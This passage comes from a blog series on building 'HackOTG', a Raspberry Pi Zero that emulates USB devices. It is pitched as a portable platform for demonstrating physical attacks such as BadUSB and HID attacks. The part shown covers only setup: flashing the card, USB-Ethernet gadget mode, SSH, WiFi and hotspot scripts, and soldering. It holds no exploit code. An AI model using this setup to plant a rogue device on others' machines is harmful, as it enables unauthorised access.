dhcpcd wpa_supplicant sudo ifconfig wlan0 0.0.0.0 (optional) _You should add the hotspot_stop.sh script to the previous _connect_wifi_ssid.sh script from this article. Otherwise you will not be able to connect to the internet anymore because the AP will be occupying the AP, add the hotspot_stop.sh command to the script like this: sh /home/pi/hotspot_stop.sh sudo wpa_supplicant -B -i wlan0 -D wext -c ssid.conf sudo dhcpcd --nohook wpa_supplicant wlan0 Start the hotspot on boot For all Debian-based distro’s there is a file /etc/rc.local that runs all commands that are put in it when the device is fully booted. Simply add a line with the hotspot_start.sh command to it (don’t forget the & at the end to make it a background-process). The command should go before the line containing “exit 0”. /etc/rc.local: # By default this script does nothing. # Print the IP address _IP=$(hostname -I) || true if [ "$_IP" ]; then printf "My IP address is %s\n" "$_IP" fi # put your scripts to boot here sh /home/pi/hotspot_start.sh& exit 0 Now you can restart the device and if everything is OK, it will create the WiFi-hotspot named “HackOTG” with the password “raspberry”. If you waited for a minute and you can’t pick up the signal, you can still log in to your device over the emulated Ethernet-to-USB device. Now you have 2 ways to connect to your HackOTG!. In the next article we will further explore the possibilities to see and controll trafiic on a network. HackOTG (v1.4): See all traffic on a network with Promiscuous mode and BettercapHackOTG (v1.2): Basic connectivity to the internet2017-10-11T00:00:00+00:002017-10-11T00:00:00+00:00https://lvlrt.github.io/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet<p><em>This article is part of a series: <a href="/2017/10/07/hackotg-v1-0-universal-portable-security-platform/">you can find the first article here</a>. If you missed the previous one, <a href="/2017/10/10/hackotg-v1-1-integrating-the-cable-for-more-portability/">it is here</a>.</em></p>
<p>After the previous article, we can plug-in our HackOTG and log in with SSH over the emulated Ethernet-adapter. Now, we don’t have internet-connectivity yet… Sometimes we will want to have an internet-connection to install new packages, backup our device or have a new way to connect to our device. In this article we will go through the basics of networking on your HackOTG.</p>
<h2>Setting up the interface and scan</h2>
<p>Log in to your HackOTG over the emulated Ethernet device:</p>
<pre>ifconfig usb0 192.168.7.3
ssh pi@192.168.7.2 #password is "raspberry"</pre>
<p><strong>Activate your Wifi-interface:</strong></p>
<pre>sudo ifconfig wlan0 up</pre>
<p><strong>Scan for available Wifi-Hotspots:</strong></p>
<pre>sudo iwlist wlan0 scan | less</pre>
<h2>Associate with the access point</h2>
<p>There are a couple different security mechanisms, in the previous performed scan you’ll find which one your chosen hotspot uses.</p>
<h3>WEP</h3>
<p>This is one of the <a href="https://en.wikipedia.org/wiki/Wired_Equivalent_Privacy">oldest security mechanisms</a>, which has many flaws but this is how you connect: (replace “testessid” and “safestpasswordever”)</p>
<pre>sudo iwconfig wlan0 essid testessid key s:safestpasswordever</pre>
<h3>WPA</h3>
<p>A common security mechanism is <a href="https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access">WPA</a>. WPA has many flavours but most of them will be accesible with the following steps.</p>
<p><strong>Create a config-file:</strong> (replace “MYSSID” and “passphrase”)</p>
<pre>wpa_passphrase <em>MYSSID passphrase</em> > <em>MYSSID</em>.conf</pre>
<p>This will create a config-file with a hashed passphrase (for security reasons). If it is a public (unsecured) WiFi, you can create the same file with these contents.</p>
<pre>network={
ssid="MYSSID"
key_mgmt=NONE
}</pre>
<p><strong>To connect:</strong> <em>(replace “interface” and “MYSSID”)</em></p>
<pre>sudo wpa_supplicant -B -i <i>interface</i> -D wext -c <em>MYSSID</em>.conf</pre>
<p>The driver “wext” can be changed out for other drivers found in the “wpa_supplicant -h” command. With the built-in wifi on the Pi zero, you can use “wext”. The “&” at the end of the command will run it in the background.</p>
<h2>Requesting an IP</h2>
<p>Now that we are assosiated and authenticated, we need an IP, We can get it from the DHCP server running on the router with this command:</p>
<pre>sudo dhcpcd --nohook wpa_supplicant wlan0</pre>
<h2>Automate the process</h2>
<p>You can write a bash script, so you can connect to a wifi-hotspot with one command. You can make multiple scripts and config-files to connect to different hotspots.</p>
<pre>sh connect_wifi_ssid.sh</pre>
<p><strong>connect_wifi_ssid.sh:</strong></p>
<pre>sudo wpa_supplicant -B -i wlan0 -D wext -c ssid.conf
sudo dhcpcd --nohook wpa_supplicant wlan0</pre>
<p>It is a good idea to make a <strong>connect_wifi_HELP.txt,</strong> that contains the wep and wpa_passphrase command and some guidelines to connect to WEP and WAP (so you don’t need this article).</p>
<p><strong>connect_wifi_HELP.sh:</strong></p>
<pre>##SCANNING
sudo iwlist wlan0 scan
##WEP
sudo iwconfig wlan0 essid testessid key s:safestpasswordever
##WPA
wpa_passphrase <em>MYSSID passphrase</em> > <em>MYSSID</em>.conf
sudo wpa_supplicant -B -i wlan0 -D wext -c MYSSID.conf
sudo dhcpcd --nohook wpa_supplicant wlan0
#unsecured? change the conf file to:
network={
ssid="MYSSID"
key_mgmt=NONE
}</pre>
<h2>Forwarding the connection</h2>
<p>You can forward the connectivity of your HackOTG through your emulated Ethernet device by simply enabling ipv4-forwarding with this command:</p>
<pre>sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"</pre>
<p>This can be handy if you need to register or fill in a form in a captive portal. Or if you just need a WiFi-connection.</p>
<h2>Checking the internet connection</h2>
<p>You will have 2 active interfaces now. By performing the <em>“route -n”</em> command, you can see the way your traffic is going to be handled. Sometimes you will want to choose the connection to use for you internet connectivity. You can do that with these scripts:</p>
<p><strong>route_wlan0.sh:</strong> (to direct all traffic through the WiFi-connection)</p>
<pre>sudo route del default
sudo dhcpcd -n wlan0</pre>
<p><strong>route_usb0.sh:</strong> (to direct all traffic the emulated ethernet connection)</p>
<pre>sudo route del default
sudo dhcpcd -n usb0</pre>
<p>Remember, if you dont’t have connectivity to the internet, check if the proper interface is on the first line in the output of the <em>“route -n”</em> command. But now that we have connectivity, we can update all our software with the following commands:</p>
<pre>sudo apt-get update
sudo apt-get upgrade
sudo apt-get dist-upgrade</pre>
<p>Great, we can connect to wifi-hotspots now, which we can not only use for an internet connection but if you know the IP (use ‘ifconfig’) you can connect to it over wifi.</p>
<p>Next, we will setup our own WiFi-hotspot, so we don’t have to configure a WiFi-hotspot over the emulated Ethernet-device if we want to SSH to the device over WiFi.</p>
<p><em>You can find the next one here:</em></p>
<blockquote class="wp-embedded-content" data-secret="tVHiU01lqM">
<p>
<a href="/2017/10/11/hackotg-v1-3-creating-our-own-hotspot-on-boot/">HackOTG (v1.3): Creating our own hotspot on boot</a>
</p>
</blockquote>Lars VeelaertThis article is part of a series: you can find the first article here. If you missed the previous one, it is here. After the previous article, we can plug-in our HackOTG and log in with SSH over the emulated Ethernet-adapter. Now, we don’t have internet-connectivity yet… Sometimes we will want to have an internet-connection to install new packages, backup our device or have a new way to connect to our device. In this article we will go through the basics of networking on your HackOTG. Setting up the interface and scan Log in to your HackOTG over the emulated Ethernet device: ifconfig usb0 192.168.7.3 ssh pi@192.168.7.2 #password is "raspberry" Activate your Wifi-interface: sudo ifconfig wlan0 up Scan for available Wifi-Hotspots: sudo iwlist wlan0 scan | less Associate with the access point There are a couple different security mechanisms, in the previous performed scan you’ll find which one your chosen hotspot uses. WEP This is one of the oldest security mechanisms, which has many flaws but this is how you connect: (replace “testessid” and “safestpasswordever”) sudo iwconfig wlan0 essid testessid key s:safestpasswordever WPA A common security mechanism is WPA. WPA has many flavours but most of them will be accesible with the following steps. Create a config-file: (replace “MYSSID” and “passphrase”) wpa_passphrase MYSSID passphrase > MYSSID.conf This will create a config-file with a hashed passphrase (for security reasons). If it is a public (unsecured) WiFi, you can create the same file with these contents. network={ ssid="MYSSID" key_mgmt=NONE } To connect: (replace “interface” and “MYSSID”) sudo wpa_supplicant -B -i interface -D wext -c MYSSID.conf The driver “wext” can be changed out for other drivers found in the “wpa_supplicant -h” command. With the built-in wifi on the Pi zero, you can use “wext”. The “&” at the end of the command will run it in the background. Requesting an IP Now that we are assosiated and authenticated, we need an IP, We can get it from the DHCP server running on the router with this command: sudo dhcpcd --nohook wpa_supplicant wlan0 Automate the process You can write a bash script, so you can connect to a wifi-hotspot with one command. You can make multiple scripts and config-files to connect to different hotspots. sh connect_wifi_ssid.sh connect_wifi_ssid.sh: sudo wpa_supplicant -B -i wlan0 -D wext -c ssid.conf sudo dhcpcd --nohook wpa_supplicant wlan0 It is a good idea to make a connect_wifi_HELP.txt, that contains the wep and wpa_passphrase command and some guidelines to connect to WEP and WAP (so you don’t need this article). connect_wifi_HELP.sh: ##SCANNING sudo iwlist wlan0 scan ##WEP sudo iwconfig wlan0 essid testessid key s:safestpasswordever ##WPA wpa_passphrase MYSSID passphrase > MYSSID.conf sudo wpa_supplicant -B -i wlan0 -D wext -c MYSSID.conf sudo dhcpcd --nohook wpa_supplicant wlan0 #unsecured? change the conf file to: network={ ssid="MYSSID" key_mgmt=NONE } Forwarding the connection You can forward the connectivity of your HackOTG through your emulated Ethernet device by simply enabling ipv4-forwarding with this command: sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward" This can be handy if you need to register or fill in a form in a captive portal. Or if you just need a WiFi-connection. Checking the internet connection You will have 2 active interfaces now. By performing the “route -n” command, you can see the way your traffic is going to be handled. Sometimes you will want to choose the connection to use for you internet connectivity. You can do that with these scripts: route_wlan0.sh: (to direct all traffic through the WiFi-connection) sudo route del default sudo dhcpcd -n wlan0 route_usb0.sh: (to direct all traffic the emulated ethernet connection) sudo route del default sudo dhcpcd -n usb0 Remember, if you dont’t have connectivity to the internet, check if the proper interface is on the first line in the output of the “route -n” command. But now that we have connectivity, we can update all our software with the following commands: sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade Great, we can connect to wifi-hotspots now, which we can not only use for an internet connection but if you know the IP (use ‘ifconfig’) you can connect to it over wifi. Next, we will setup our own WiFi-hotspot, so we don’t have to configure a WiFi-hotspot over the emulated Ethernet-device if we want to SSH to the device over WiFi. You can find the next one here: HackOTG (v1.3): Creating our own hotspot on bootHackOTG (v1.1): Integrating the cable for more portability2017-10-10T00:00:00+00:002017-10-10T00:00:00+00:00https://lvlrt.github.io/2017/10/10/hackotg-v1-1-integrating-the-cable-for-more-portability<p><img src="/assets/HackOTG3.jpg" alt="Hackotg complete with usb" /></p>
<p><em>This article is part of a series: <a href="/2017/10/07/hackotg-v1-0-universal-portable-security-platform/">you can find the first article here</a>.</em></p>
<p>Before we start using our device, we have to make sure it is a good form-factor for our purpose and at this point, we will always need a USB-cable attached to the device, to be able to interface with it. In the future we will sometimes want to connect with WiFi so we can use the same connection to emulate different devices for our physical attacks.</p>
<p>No matter what, we will need the cable attached to it, be it for power, connectivity or attack. There are handy connections on the bottom of the Pi zero to make the following process easier. If you don’t want to perform this mod, you don’t need to, but it is very handy and makes the whole platform more compact and portable.</p>
<h2>What do you need?</h2>
<ul>
<li>Soldering iron, solder and tweezers (small wires)</li>
<li>Pi zero</li>
<li>Spare USB-cable</li>
<li>Small zip tie</li>
<li>Knife</li>
<li>Pliers</li>
<li>Glue</li>
</ul>
<h2>Putting it all together</h2>
<p><img src="/assets/rpi_usb.jpg" alt="Rpi USB" /></p>
<p>No surprises here, snip of the USB-A side, strip the cable from the black plastic layer, and you’ll find a metallic shielding layer with 4 cables in it (white, green, red, black). Those are 2 data-cables and 2 for power. If you make 2 small indentations on both sides of the USB-port, you can tie a cable-tie around it and through the holes. Pull the cable-tie very tight (use pliers) and it wont move anymore.</p>
<p>Solder the cables to the pads with respective indicated color on the image below. The cables can be as short as 5cm. You can drop a bit of glue onto the wires to insulate them form each other again.</p>
<p><img src="/assets/solder_pins_rpi.png" alt="Pins rpi" /></p>
<h2>The result and what’s next?</h2>
<p>Now you don’t have to carry a USB-cable together with the Pi, it is already integrated in the device! If you plug it straight into a power source (battery, wall-socket, …) it will boot. And if the device is also a USB-host, it will present itself as an Ethernet-to-USB adapter and we can SSH into it to perform our work. Now we can start using our HackOTG everywhere!</p>
<p><img src="/assets/HackOTG3.jpg" alt="Hackotg complete with usb" /></p>
<p><em>You can find the next one here:</em></p>
<blockquote class="wp-embedded-content" data-secret="zjGS1XMwjZ">
<p>
<a href="/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet/">HackOTG (v1.2): Basic connectivity to the internet</a>
</p>
</blockquote>Lars VeelaertThis article is part of a series: you can find the first article here. Before we start using our device, we have to make sure it is a good form-factor for our purpose and at this point, we will always need a USB-cable attached to the device, to be able to interface with it. In the future we will sometimes want to connect with WiFi so we can use the same connection to emulate different devices for our physical attacks. No matter what, we will need the cable attached to it, be it for power, connectivity or attack. There are handy connections on the bottom of the Pi zero to make the following process easier. If you don’t want to perform this mod, you don’t need to, but it is very handy and makes the whole platform more compact and portable. What do you need? Soldering iron, solder and tweezers (small wires) Pi zero Spare USB-cable Small zip tie Knife Pliers Glue Putting it all together No surprises here, snip of the USB-A side, strip the cable from the black plastic layer, and you’ll find a metallic shielding layer with 4 cables in it (white, green, red, black). Those are 2 data-cables and 2 for power. If you make 2 small indentations on both sides of the USB-port, you can tie a cable-tie around it and through the holes. Pull the cable-tie very tight (use pliers) and it wont move anymore. Solder the cables to the pads with respective indicated color on the image below. The cables can be as short as 5cm. You can drop a bit of glue onto the wires to insulate them form each other again. The result and what’s next? Now you don’t have to carry a USB-cable together with the Pi, it is already integrated in the device! If you plug it straight into a power source (battery, wall-socket, …) it will boot. And if the device is also a USB-host, it will present itself as an Ethernet-to-USB adapter and we can SSH into it to perform our work. Now we can start using our HackOTG everywhere! You can find the next one here: HackOTG (v1.2): Basic connectivity to the internetHackOTG (v1.0): A universal, portable, security-platform2017-10-07T00:00:00+00:002017-10-07T00:00:00+00:00https://lvlrt.github.io/2017/10/07/hackotg-v1-0-universal-portable-security-platform<p><img src="/assets/HackOTG.jpg" alt="HackOTG" /></p>
<p><em>When demonstrating a possible attack vector to a friend or a client, you want something standalone that is not influenced by your day-to-day tasks. Many have a persistent <a href="https://www.kali.org/">Kali Linux</a> on a bootable USB-drive exactly for this purpose. There are also many attack-vectors which require physical devices. Exploits like <a href="https://larsveelaert.github.io/2017/10/03/hack-get-free-wifi-on-paid-access-hotspots/">DNS-tunneling</a>, HID-attacks and <a href="https://www.topsec.com/it-security-news-and-info/what-is-badusb-and-should-i-be-scared">BadUSB</a> are only a couple of examples.</em></p>
<p>You can buy specific devices like the <a href="https://hakshop.com/products/usb-rubber-ducky-deluxe">USB rubber ducky</a> to perform these attacks in an easy, portable, quick way. Apart from being quite costly, you can’t carry them all in your everyday backpack and they often require to be reprogrammed for a different attack on the same vector… So having multiple will only make it worse.</p>
<p>I’ve ported a lot of my physical exploits and some wifi-exploits to my Android device. It’s disguised, an all-in-one and you’ll always have it on you. An OTG-cable in my backpack and I’m ready to go… But often a lot of these exploits require a custom kernel or some modules to be able to function. Many tweaks are also device specific. When there is an update, a lot of unexpected things can happen. Not the best solution.</p>
<p>So I was searching something open-source, portable, inexpensive, expendable, easy-to-mod and easy to interface with and change it behavior and I found this:</p>
<p><img src="/assets/Rpizero.png" alt="Rpi Zero on adafruit" /></p>
<p>It is essentially a small stand-alone computer, running Linux of an SD-card. What is cool about this model is, that it has WiFi and Bluetooth and a board-setup configured to support USB-gadget or OTG mode. Which can change one of the micro-USB ports in whatever USB-device that you want (HID, Ethernet Dongle, Mass-storage, MIDI, … ). It is powered with a normal 5v micro-USB cable plugged in a USB-device or wall-adapter.</p>
<p>We can set it up as a headless device that we can ssh into over a WiFi-signal or even easier, making it emulate an ethernet device. The rest of this article will describe how to get it to emulate an Ethernet to USB controller and SSH’ing into it without ever attaching a display.</p>
<h2>Preparing the SD-card</h2>
<p>The software that is best adapted to the hardware is <a href="https://www.raspberrypi.org/documentation/raspbian/">Raspbian</a>. You can try to do the same steps on other ARM OS-distro’s, but from my experience they lack a lot of support for OTG. The idea is to make a very-easy-to-recreate setup so if it is not your favourite flavour of linux, no worries.</p>
<p>There are <a href="https://www.raspberrypi.org/documentation/installation/installing-images/">many ways to install Raspbian</a>, but you basically download the <a href="https://en.wikipedia.org/wiki/Disk_image">diskimage</a> and write it to the SD-card. if your SD-card is bigger than the original disk-image, expand the partition to its full size. In this article you’ll find a guide how to do this on Linux.</p>
<p>A SD-card in a raspberry pi consists of 1 small FAT-partition with boot files and 1 large EXT4-partition. Recreating the partition table and copying the right files on each will also give you a working system (but Raspbian gives you a ready disk-image).</p>
<p><strong>Download the Raspbian Lite-image:</strong> (You don’t need te full one)</p>
<p><img src="/assets/raspian_download.png" alt="Raspbian Download" /></p>
<pre>wget https://downloads.raspberrypi.org/raspbian_lite_latest
unzip raspbian_lite_latest #will unzip an .img file</pre>
<p><strong>Flash your SD-card:</strong></p>
<p>Plug your SD-card in your pc with an card-reader. Your SD-card size and type matter, but are not that important. You want a fast one (indicated by its class, 10 is best) and anything above 2 gb will work well if using the lite-image. If you deploy this somewhere and it has to record or log something, make sure that it has disk-space to do so. At the time of writing a quality SD-card of 32 gb is 20 EUR, so that would bring the total cost to ~30 EUR excluding cables (which you probably have too much of).</p>
<p><span style="text-decoration: underline;">Double-check before running these commands!</span></p>
<pre>fdisk -l #lookup the device name of your SD-card (ex. /dev/mmcblk1)</pre>
<pre class="output">Disk <strong>/dev/mmcblk1</strong>: 29.8 GiB, 32026656768 bytes, 62552064 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000
Device Boot Start End Sectors Size Id Type
/dev/mmcblk1p1 8192 62552063 62543872 29.8G c W95 FAT32 (LBA)</pre>
<pre>dd bs=4M if=2017-09-07-raspbian-stretch-lite.img of=/dev/mmcblk1 conv=fsync #change /dev/mmcblk1</pre>
<pre class="output">442+1 records in
442+1 records out
1854590976 bytes (1.9 GB, 1.7 GiB) copied, 99.8628 s, 18.6 MB/s</pre>
<p><strong>Resize partition to full disk: </strong><em>(Optional)</em></p>
<pre>fdisk /dev/mmcblk1 #change /dev/mmcblk1 to your device</pre>
<pre class="output">Welcome to fdisk (util-linux 2.30.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
<strong>Command (m for help): p</strong>
Disk /dev/mmcblk1: 29.8 GiB, 32026656768 bytes, 62552064 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x11eccc69
Device Boot Start End Sectors Size Id Type
/dev/mmcblk1p1 8192 93813 85622 41.8M c W95 FAT32 (LBA)
/dev/mmcblk1p2 94208 62552063 62457856 29.8G 83 Linux
<strong>Command (m for help): d</strong>
<strong>Partition number (1,2, default 2): 2</strong>
Partition 2 has been deleted.
<strong>Command (m for help): n</strong>
Partition type
p primary (1 primary, 0 extended, 3 free)
e extended (container for logical partitions)
<strong>Select (default p): p</strong>
<strong>Partition number (2-4, default 2): 2</strong>
<strong>First sector (2048-62552063, default 2048): 94208</strong>
Last sector, +sectors or +size{K,M,G,T,P} (94208-62552063, default 62552063):
Created a new partition 2 of type 'Linux' and of size 29.8 GiB.
Partition #2 contains a ext4 signature.
<strong>Do you want to remove the signature? [Y]es/[N]o: n</strong><strong>
Command (m for help): w</strong>
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.</pre>
<p>At this point you will have a working operating system.</p>
<h2>Configuring the device</h2>
<p>Now that you having a working image, it is time to change some files with settings to make you able to connect to it. This will be achieved by configuring the OTG-port (micro-usb port marked with “USB”) to emulate an Ethernet-to-USB dongle. With a working connection, we will be able to log in through SSH.</p>
<p><strong>Mount both partitions:</strong></p>
<pre>mkdir boot
mount /dev/mmcblk1p1 boot
mkdir root
mount /dev/mmcblk1p2 root</pre>
<p><strong>Setup USB-gadget, Ethernet-to-USB:</strong></p>
<p>Add a line to boot/config.txt, using this command;</p>
<pre>echo 'dtoverlay=dwc2' >> boot/config.txt</pre>
<p>After the command ‘rootwait’ in boot/cmdline.txt add the following command (keep it as one line);</p>
<pre># boot/cmdline.txt
... rootwait modules-load=dwc2,g_ether ...</pre>
<p>This will load the kernel-module needed and emulate a Ethernet-to-USB device on the USB port. You can also change this after the device is booted, but we have no other way of accessing the device, so we want this behavior on boot.</p>
<p><strong>Configure a static IP:</strong></p>
<p>Open the file root/etc/network/interfaces and add the following snippet to the end of the file:</p>
<pre><span class="pln"># root/etc/network/interfaces
allow</span><span class="pun">-</span><span class="pln">hotplug usb0
</span><span class="pln">iface usb0 inet </span><span class="kwd">static
</span><span class="pln">address </span><span class="lit">192.168</span><span class="pun">.</span><span class="lit">7.2
</span><span class="pln">netmask </span><span class="lit">255.255</span><span class="pun">.</span><span class="lit">255.0
</span><span class="pln">network </span><span class="lit">192.168</span><span class="pun">.</span><span class="lit">7.0
</span><span class="pln">broadcast </span><span class="lit">192.168</span><span class="pun">.</span><span class="lit">7.255
</span><span class="pln">gateway </span><span class="lit">192.168</span><span class="pun">.</span><span class="lit">7.1
</span></pre>
<p>If the device is connected with its emulated ethernet-device, we will know its IP without using a DHCP-server or discovery-service.</p>
<p><strong>Enable SSH-server (headless way):</strong></p>
<p>SSH-server was enabled on the early versions but there was <a href="https://www.raspberrypi.org/documentation/remote-access/ssh/">a security issue</a> for many people who were not aware of this. To make it easy to enable this feature you can put an empty file named ‘ssh’ on the boot partition and it will enable it for you (the file will be gone after).</p>
<pre>touch boot/ssh</pre>
<p><strong>Unmount the SD-card:</strong></p>
<pre>sync
unmount boot root</pre>
<h2>Using the device</h2>
<p>If everything is set up correctly, you can use a micro-USB to USB-A (regular charging cable) to connect your device with the “USB” marked port to your computer (or any other device with a terminal). The connection will give both a 5V power and a data-connection to your Pi. After plugging the device in, the ACT light will start blinking if the SD-card has a bootable operating system on it. The first time the boot up process will take longer, but normally this takes about 10 seconds.</p>
<p><img src="/assets/HackOTG.jpg" alt="HackOTG" /></p>
<p>On Linux, you can check your interfaces by issuing the command:</p>
<pre>ifconfig</pre>
<p>If everything is working properly, you’ll see this new interface;</p>
<pre class="output">...
usb0: flags=4163<up,broadcast,running,multicast> mtu 1500
inet6 fe80::a8ac:4ff:fe31:3a2e prefixlen 64 scopeid 0x20
ether aa:ac:04:31:3a:2e txqueuelen 1000 (Ethernet)
RX packets 28 bytes 3312 (3.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5 bytes 734 (734.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
...</up,broadcast,running,multicast></pre>
<p>To be able to SSH to the device we will need an IP ourselves. There is no DHCP-server on this 2-man network so we will give us one ourselves (in the same netmask). Use this command: (You’ll have to do this every time you plug in the device)</p>
<pre>ifconfig usb0 192.168.7.3</pre>
<p>Now you can SSH to this device with the default credentials (user: pi, pass: raspberry):</p>
<pre>ssh pi@192.168.7.2</pre>
<h2>What next?</h2>
<p>Now that we have the basics figured out, in the next version we will hack the hardware to make the device include a USB-port so it is truly portable.</p>
<p>In the rest of the series we will start building our universal hacking/debugging tool so we can connect to it over WiFi and use its emulation capabilities to demonstrate physical attack-vectors.</p>
<p><em>You can find the next one here:</em></p>
<blockquote class="wp-embedded-content" data-secret="HpdD86nrmQ">
<p>
<a href="/2017/10/10/hackotg-v1-1-integrating-the-cable-for-more-portability/">HackOTG (v1.1): Integrating the cable for more portability</a>
</p>
</blockquote>Lars VeelaertWhen demonstrating a possible attack vector to a friend or a client, you want something standalone that is not influenced by your day-to-day tasks. Many have a persistent Kali Linux on a bootable USB-drive exactly for this purpose. There are also many attack-vectors which require physical devices. Exploits like DNS-tunneling, HID-attacks and BadUSB are only a couple of examples. You can buy specific devices like the USB rubber ducky to perform these attacks in an easy, portable, quick way. Apart from being quite costly, you can’t carry them all in your everyday backpack and they often require to be reprogrammed for a different attack on the same vector… So having multiple will only make it worse. I’ve ported a lot of my physical exploits and some wifi-exploits to my Android device. It’s disguised, an all-in-one and you’ll always have it on you. An OTG-cable in my backpack and I’m ready to go… But often a lot of these exploits require a custom kernel or some modules to be able to function. Many tweaks are also device specific. When there is an update, a lot of unexpected things can happen. Not the best solution. So I was searching something open-source, portable, inexpensive, expendable, easy-to-mod and easy to interface with and change it behavior and I found this: It is essentially a small stand-alone computer, running Linux of an SD-card. What is cool about this model is, that it has WiFi and Bluetooth and a board-setup configured to support USB-gadget or OTG mode. Which can change one of the micro-USB ports in whatever USB-device that you want (HID, Ethernet Dongle, Mass-storage, MIDI, … ). It is powered with a normal 5v micro-USB cable plugged in a USB-device or wall-adapter. We can set it up as a headless device that we can ssh into over a WiFi-signal or even easier, making it emulate an ethernet device. The rest of this article will describe how to get it to emulate an Ethernet to USB controller and SSH’ing into it without ever attaching a display. Preparing the SD-card The software that is best adapted to the hardware is Raspbian. You can try to do the same steps on other ARM OS-distro’s, but from my experience they lack a lot of support for OTG. The idea is to make a very-easy-to-recreate setup so if it is not your favourite flavour of linux, no worries. There are many ways to install Raspbian, but you basically download the diskimage and write it to the SD-card. if your SD-card is bigger than the original disk-image, expand the partition to its full size. In this article you’ll find a guide how to do this on Linux. A SD-card in a raspberry pi consists of 1 small FAT-partition with boot files and 1 large EXT4-partition. Recreating the partition table and copying the right files on each will also give you a working system (but Raspbian gives you a ready disk-image). Download the Raspbian Lite-image: (You don’t need te full one) wget https://downloads.raspberrypi.org/raspbian_lite_latest unzip raspbian_lite_latest #will unzip an .img file Flash your SD-card: Plug your SD-card in your pc with an card-reader. Your SD-card size and type matter, but are not that important. You want a fast one (indicated by its class, 10 is best) and anything above 2 gb will work well if using the lite-image. If you deploy this somewhere and it has to record or log something, make sure that it has disk-space to do so. At the time of writing a quality SD-card of 32 gb is 20 EUR, so that would bring the total cost to ~30 EUR excluding cables (which you probably have too much of). Double-check before running these commands! fdisk -l #lookup the device name of your SD-card (ex. /dev/mmcblk1) Disk /dev/mmcblk1: 29.8 GiB, 32026656768 bytes, 62552064 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x00000000 Device Boot Start End Sectors Size Id Type /dev/mmcblk1p1 8192 62552063 62543872 29.8G c W95 FAT32 (LBA) dd bs=4M if=2017-09-07-raspbian-stretch-lite.img of=/dev/mmcblk1 conv=fsync #change /dev/mmcblk1 442+1 records in 442+1 records out 1854590976 bytes (1.9 GB, 1.7 GiB) copied, 99.8628 s, 18.6 MB/s Resize partition to full disk: (Optional) fdisk /dev/mmcblk1 #change /dev/mmcblk1 to your device Welcome to fdisk (util-linux 2.30.2). Changes will remain in memory only, until you decide to write them. Be careful before using the write command. Command (m for help): p Disk /dev/mmcblk1: 29.8 GiB, 32026656768 bytes, 62552064 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x11eccc69 Device Boot Start End Sectors Size Id Type /dev/mmcblk1p1 8192 93813 85622 41.8M c W95 FAT32 (LBA) /dev/mmcblk1p2 94208 62552063 62457856 29.8G 83 Linux Command (m for help): d Partition number (1,2, default 2): 2 Partition 2 has been deleted. Command (m for help): n Partition type p primary (1 primary, 0 extended, 3 free) e extended (container for logical partitions) Select (default p): p Partition number (2-4, default 2): 2 First sector (2048-62552063, default 2048): 94208 Last sector, +sectors or +size{K,M,G,T,P} (94208-62552063, default 62552063): Created a new partition 2 of type 'Linux' and of size 29.8 GiB. Partition #2 contains a ext4 signature. Do you want to remove the signature? [Y]es/[N]o: n Command (m for help): w The partition table has been altered. Calling ioctl() to re-read partition table. Syncing disks. At this point you will have a working operating system. Configuring the device Now that you having a working image, it is time to change some files with settings to make you able to connect to it. This will be achieved by configuring the OTG-port (micro-usb port marked with “USB”) to emulate an Ethernet-to-USB dongle. With a working connection, we will be able to log in through SSH. Mount both partitions: mkdir boot mount /dev/mmcblk1p1 boot mkdir root mount /dev/mmcblk1p2 root Setup USB-gadget, Ethernet-to-USB: Add a line to boot/config.txt, using this command; echo 'dtoverlay=dwc2' >> boot/config.txt After the command ‘rootwait’ in boot/cmdline.txt add the following command (keep it as one line); # boot/cmdline.txt ... rootwait modules-load=dwc2,g_ether ... This will load the kernel-module needed and emulate a Ethernet-to-USB device on the USB port. You can also change this after the device is booted, but we have no other way of accessing the device, so we want this behavior on boot. Configure a static IP: Open the file root/etc/network/interfaces and add the following snippet to the end of the file: # root/etc/network/interfaces allow-hotplug usb0 iface usb0 inet static address 192.168.7.2 netmask 255.255.255.0 network 192.168.7.0 broadcast 192.168.7.255 gateway 192.168.7.1 If the device is connected with its emulated ethernet-device, we will know its IP without using a DHCP-server or discovery-service. Enable SSH-server (headless way): SSH-server was enabled on the early versions but there was a security issue for many people who were not aware of this. To make it easy to enable this feature you can put an empty file named ‘ssh’ on the boot partition and it will enable it for you (the file will be gone after). touch boot/ssh Unmount the SD-card: sync unmount boot root Using the device If everything is set up correctly, you can use a micro-USB to USB-A (regular charging cable) to connect your device with the “USB” marked port to your computer (or any other device with a terminal). The connection will give both a 5V power and a data-connection to your Pi. After plugging the device in, the ACT light will start blinking if the SD-card has a bootable operating system on it. The first time the boot up process will take longer, but normally this takes about 10 seconds. On Linux, you can check your interfaces by issuing the command: ifconfig If everything is working properly, you’ll see this new interface; ... usb0: flags=4163<up,broadcast,running,multicast> mtu 1500 inet6 fe80::a8ac:4ff:fe31:3a2e prefixlen 64 scopeid 0x20 ether aa:ac:04:31:3a:2e txqueuelen 1000 (Ethernet) RX packets 28 bytes 3312 (3.2 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 5 bytes 734 (734.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ...</up,broadcast,running,multicast> To be able to SSH to the device we will need an IP ourselves. There is no DHCP-server on this 2-man network so we will give us one ourselves (in the same netmask). Use this command: (You’ll have to do this every time you plug in the device) ifconfig usb0 192.168.7.3 Now you can 